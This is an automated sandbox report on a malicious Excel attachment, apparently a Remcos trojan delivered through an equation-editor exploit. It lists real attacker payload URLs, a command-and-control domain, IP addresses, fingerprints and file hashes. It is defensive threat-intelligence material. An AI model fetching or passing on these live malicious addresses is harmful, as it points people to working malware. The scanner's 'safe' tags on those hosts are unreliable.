                https://ia803104.us.archive.org/27/items/vbs_20240LRpowershell.exe, 0000000B.00000002.516053834.0000000002603000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv2AF7.tmp.15.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://zhort.de/FoNVg0yX~DFAEDAA30879C445E4.TMP.0.dr, 9EC30000.0.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.ccleaner.com/go/app_cc_pro_trialkeybhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://crl.entrust.net/server1.crl0powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contextual.media.net/8/nrrV73987.jsbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000012.00000002.518814994.00000000005E9000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFUEQNEDT32.EXE, 00000009.00000003.492215861.0000000000364000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.492251431.000000000036F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contextual.media.net/bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://www.msn.com/bhv2AF7.tmp.15.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                http://cdn.at.atwola.com/_media/uac/msn.htmlbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                https://www.google.com/accounts/serviceloginRegAsm.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                https://secure.comodo.com/CPS0powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://policies.yahoo.com/w3c/p3p.xmlbhv2AF7.tmp.15.drfalse
                • URL Reputation: safe
                		unknown
                https://zhort.de/zhort.de.url.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.msn.com/advertisement.ad.jsbhv2AF7.tmp.15.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFjEQNEDT32.EXE, 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                207.241.232.154
                		ia803104.us.archive.orgUnited States
                		7941INTERNET-ARCHIVEUStrue
                192.210.214.9
                		2024remcmon.duckdns.orgUnited States
                		36352AS-COLOCROSSINGUStrue
                88.99.66.38
                		zhort.deGermany
                		24940HETZNER-ASDEtrue
                107.172.31.21
                		unknownUnited States
                		36352AS-COLOCROSSINGUStrue
                178.237.33.50
                		geoplugin.netNetherlands
                		8455ATOM86-ASATOM86NLfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1500264
                Start date and time:2024-08-28 06:52:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 46s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:20
                Number of new started drivers analysed:1
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:RFQ No. 109078906v.xla.xlsx
                Detection:MAL
                Classification:mal100.phis.troj.spyw.expl.evad.winXLSX@19/30@11/5
                EGA Information:
                • Successful, ratio: 85.7%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 179
                • Number of non-executed functions: 326
                Cookbook Comments:
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer

                Warnings

                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
                • Execution Graph export aborted for target powershell.exe, PID 3084 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                00:54:02API Interceptor53x Sleep call for process: EQNEDT32.EXE modified
                00:54:05API Interceptor6x Sleep call for process: wscript.exe modified
                00:54:06API Interceptor100x Sleep call for process: powershell.exe modified
                00:54:13API Interceptor360x Sleep call for process: RegAsm.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                207.241.232.154SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                    another.rtfGet hashmaliciousRemcosBrowse
                      Faktura.vbsGet hashmaliciousRemcosBrowse
                        M12_20240821.xlsGet hashmaliciousRemcosBrowse
                          PO_20931.xlsGet hashmaliciousRemcosBrowse
                            PO082724.xlsGet hashmaliciousRemcosBrowse
                              PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                  SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtfGet hashmaliciousRemcosBrowse
                                    192.210.214.9SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                        SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.14066.27544.rtfGet hashmaliciousRemcosBrowse
                                          PURCHASE ORDER.xla.xlsxGet hashmaliciousRemcosBrowse
                                            PURCHASE ORDER.xla.xlsxGet hashmaliciousRemcosBrowse
                                              PURCHASE ORDER.xla.xlsxGet hashmaliciousRemcosBrowse
                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.6971.10894.rtfGet hashmaliciousRemcosBrowse
                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.16107.31846.rtfGet hashmaliciousRemcosBrowse
                                                    RFQ#TLPO24-14.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      RFQ#TLPO24-14.xla.xlsxGet hashmaliciousRemcosBrowse
                                                        88.99.66.38M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                          PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                            350.xlsGet hashmaliciousFormBookBrowse
                                                              PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                                                  SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                    RFQ_0826024.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      107.172.31.21SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                      • 107.172.31.21/xampp/kkb/KLMN.txt
                                                                      Tl9bHdZo1S.htaGet hashmaliciousCobalt Strike, GuLoaderBrowse
                                                                      • 107.172.31.21/450/MsMpEng.exe
                                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 107.172.31.21/xampp/kkb/KLMN.txt
                                                                      SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 107.172.31.21/330/MsMpEng.exe
                                                                      Thermo Fisher RFQ_TFS-1407.xlsGet hashmaliciousGuLoaderBrowse
                                                                      • 107.172.31.21/xampp/cbn/IEnetupdate.hta
                                                                      178.237.33.50SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      rnr.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      PRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      2024remcmon.duckdns.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.14066.27544.rtfGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      PURCHASE ORDER.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      PURCHASE ORDER.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      PURCHASE ORDER.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.16107.31846.rtfGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      RFQ#TLPO24-14.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.7487.20111.rtfGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.13863.6146.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 192.210.214.9
                                                                      zhort.deM12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      350.xlsGet hashmaliciousFormBookBrowse
                                                                      • 88.99.66.38
                                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 88.99.66.38
                                                                      SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      RFQ_0826024.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      ia803104.us.archive.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtfGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      geoplugin.netSecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      rnr.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      PRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      AS-COLOCROSSINGUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                      • 107.172.31.21
                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                      • 198.46.178.181
                                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                                      • 198.46.178.137
                                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 192.210.214.138
                                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 192.210.214.138
                                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 192.210.214.138
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • 192.3.64.135
                                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                      • 198.46.178.137
                                                                      Inv 30532.xlsGet hashmaliciousRemcosBrowse
                                                                      • 198.12.81.225
                                                                      French Group.jsGet hashmaliciousRemcosBrowse
                                                                      • 192.3.101.17
                                                                      INTERNET-ARCHIVEUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtfGet hashmaliciousRemcosBrowse
                                                                      • 207.241.232.154
                                                                      HETZNER-ASDEZKB - Zahlungsbest#U00e4tigung an 20240828.pdf.exeGet hashmaliciousQuasarBrowse
                                                                      • 195.201.57.90
                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                      • 94.130.188.148
                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                      • 94.130.188.148
                                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                      • 94.130.188.148
                                                                      Setup.exeGet hashmaliciousVidarBrowse
                                                                      • 94.130.188.148
                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                      • 94.130.188.148
                                                                      Vak#U0131fBank - #U00d6deme onay makbuzu 20240826.pdf.exeGet hashmaliciousQuasarBrowse
                                                                      • 195.201.57.90
                                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                                      • 135.181.213.52
                                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      AS-COLOCROSSINGUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                      • 107.172.31.21
                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                      • 198.46.178.181
                                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                                      • 198.46.178.137
                                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 192.210.214.138
                                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 192.210.214.138
                                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 192.210.214.138
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • 192.3.64.135
                                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                      • 198.46.178.137
                                                                      Inv 30532.xlsGet hashmaliciousRemcosBrowse
                                                                      • 198.12.81.225
                                                                      French Group.jsGet hashmaliciousRemcosBrowse
                                                                      • 192.3.101.17

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      350.xlsGet hashmaliciousFormBookBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtfGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      • 207.241.232.154
                                                                      7dcce5b76c8b17472d024758970a406bRFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 88.99.66.38
                                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 88.99.66.38
                                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      350.xlsGet hashmaliciousFormBookBrowse
                                                                      • 88.99.66.38
                                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      Inv 30532.xlsGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                      • 88.99.66.38
                                                                      SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                                                      • 88.99.66.38

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):131072
                                                                      Entropy (8bit):0.025630255835805735
                                                                      Encrypted:false
                                                                      SSDEEP:6:I3DPcfCo7FvxggLR3jqEqtCJkDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPNod3quJsvYg3J/
                                                                      MD5:BBD11F270D6870E9F44AF512EC81005C
                                                                      SHA1:3EB001FCCB24E107F8F8B9CC58B34DA2ADAE9F78
                                                                      SHA-256:C88651DCB44162513A04F47447CD3A7A1BD8B950ECC10CC8602F96251E0DD9F5
                                                                      SHA-512:9BD49FF4B67B5B6E3209304788B5B582EFEA4793A6563609004855D2411D2DD54ABC910B08C5AFD8DC84A39ADEBE4380780FE13E1537E33C8DF1311168B86430
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:......M.eFy...zX...S..O...l.".;S,...X.F...Fa.q............................'...&lDD..|...(...........eS..E....}........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4760
                                                                      Entropy (8bit):4.834060479684549
                                                                      Encrypted:false
                                                                      SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                      MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                      SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                      SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                      SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):962
                                                                      Entropy (8bit):5.013811273052389
                                                                      Encrypted:false
                                                                      SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                      MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                      SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                      SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
